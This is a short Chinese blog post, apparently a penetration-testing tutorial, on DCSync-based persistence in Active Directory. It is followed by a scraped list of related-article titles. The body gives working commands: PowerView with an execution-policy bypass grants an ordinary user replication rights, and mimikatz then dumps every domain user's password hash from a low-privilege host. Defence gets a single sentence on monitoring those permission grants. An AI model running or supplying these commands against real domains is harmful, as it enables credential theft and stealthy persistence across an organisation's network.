文章目录

  • 前言
  • 利用过程
  • 防御方法

前言

DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE:

DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2

DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

DS-Replication-Get-Changes-In-Filtered-Set,对应GUID为:89e95b76-444d-4c62-991a-0facbeda640c

利用过程

powerview

Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose

使用mimikatz在低权限主机上读取域内其他用户的密码

privilege::Debug #可以不用这一句
lsadump::dcsync /all /csv

结果如下,在低权限的zhangsan主机上可以使用mimikatz读取域内所有用户的hash:

删除账号dcsync权限:

Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose

防御方法

监控前面讲述的几个权限的分配情况。

赋予域内普通用户dcsync权限来变向权限维持相关推荐

  1. 【域渗透】教你怎么利用DCSync导出域内所有用户hash

    前言 在之前的文章<域渗透--DCSync>曾系统的整理过DCSync的利用方法,本文将要针对利用DCSync导出域内所有用户hash这一方法进行详细介绍,分析不同环境下的利用思路,给出防 ...

  2. ISA服务器之域内×××用户在外网通过CA验证连接域内×××服务器

    一般情况下×××用户在连接×××服务器是是要输入密码的,如果这样的话,那么在一些公共场合输入密码的时候很有可能造成密码的泄露,从而造成不必要的损失.口令验证协议虽然硬件上的要求没有质询握手协议那么高, ...

  3. ad域同步其他ldap账号_域渗透——普通用户权限获得DNS记录

    0x00 前言 在之前的文章<域渗透--DNS记录的获取>介绍了域渗透中获得DNS管理员权限后获取DNS记录的方法,而更普遍的情况是只有域普通用户的权限,也需要获得DNS记录. 本文将会参 ...

  4. 域中计算机与用户,域内计算机和用户获取实现vbs代码

    显示当前域内所有计算机名称及数目 Const ADS_SCOPE_SUBTREE = 2 Set objRootDSE = GetObject("LDAP://rootDSE") ...

  5. 域渗透—域内用户枚举与密码喷洒攻击(Password Spraying)

    目录 域内用户枚举 枚举原理 枚举tools 密码喷洒攻击 喷洒原理 喷洒工具 本章需要对Kerberos认证原理有所了解,传送门--> Kerberos 认证学习笔记 ,以及内网方面的知识 - ...

  6. Cobalt Strike 域内渗透

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...

  7. 计算机上用户和组的意义,在域中管理用户和组

    本章要点: Ø 用户帐号和组概述 Ø 创建和管理用户帐号 Ø 在域中使用组的策略 3.1 用户帐号和组概述 活动目录是一种保存和维护网络资源所需的数据的目录服务数据库.域用户帐号在AD中创建一次,就能 ...

  8. CVE-2021-42287、CVE-2021-42278域内提权漏洞

    目录 影响范围 漏洞介绍 测试环境 漏洞复现 使用sam-the-admin.py 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE- ...

  9. 内网安全:域内信息收集

    目录 环境搭建 域基础知识 工作组和域 现实背景 常规信息收集 方式一:操作系统命令执行 常用总结 方式二:使用CS插件 关键信息收集 密码抓取测试 自动化信息收集工具 ADFind BloodHou ...

最新文章

  1. UML类图与类的关系
  2. ATP检查的一些TIPS
  3. [转]jkeyll的安装步骤
  4. chrome关闭自动升级_为什么Chrome的自动完成功能不安全以及如何将其关闭
  5. 1208. 尽可能使字符串相等
  6. vue中v-for的使用以及注意事项
  7. 以一定概率执行某段代码(Python实现)
  8. self-sizing cell的一个问题
  9. 修改整合的Jfinal的Model自动绑定表插件 AutoTableBindPlugin
  10. matlab教程simulink,MatlabSimulink教程课件.ppt
  11. vue的Des加密解密
  12. 计算机如何共享文件夹给另一台电脑,如何共享文件夹到另一台电脑,两台电脑要怎么共享文件呢?...
  13. 液晶显示屏简介以及与CRT显示屏的对比
  14. 10台堆垛机同时启动的那一刹那!
  15. 选择并遮住工具(边缘调整工具)+剪切蒙版法,扣除头发丝
  16. 第三届火焰杯软件测试初赛题目
  17. linux下s3c2440开发板,SAMSUNG S3C2440 ARM LINUX 开发板 上手初体验 --开发环境搭建
  18. 基于DDD的现代ASP.NET开发框架--ABP系列之2、ABP入门教程
  19. BDB(ICCV2019)
  20. 5.4 BGP地址聚合

热门文章

  1. php 超出省略号,input实现文字超出省略号(代码示例)
  2. Matlab CPU并行计算
  3. ICLR 2023 超高分工作|把图片视为点集,简单聚类算法实现强悍视觉架构
  4. 麦当劳、雀巢、汉高、赛诺菲、拜耳等企业入选“中国杰出雇主”榜单
  5. 这是C语言结课前(期末考试之前)写给牛晓霞的一封信!
  6. eclipse启动tomcat服务器特别慢-解决方法
  7. 密码学基础之对称密码体制和公钥密码体制
  8. 阻塞队列——生产者消费者模型
  9. python中常见的魔法方法 magic method
  10. sipp模拟freepbx分机测试(SIP协议调试)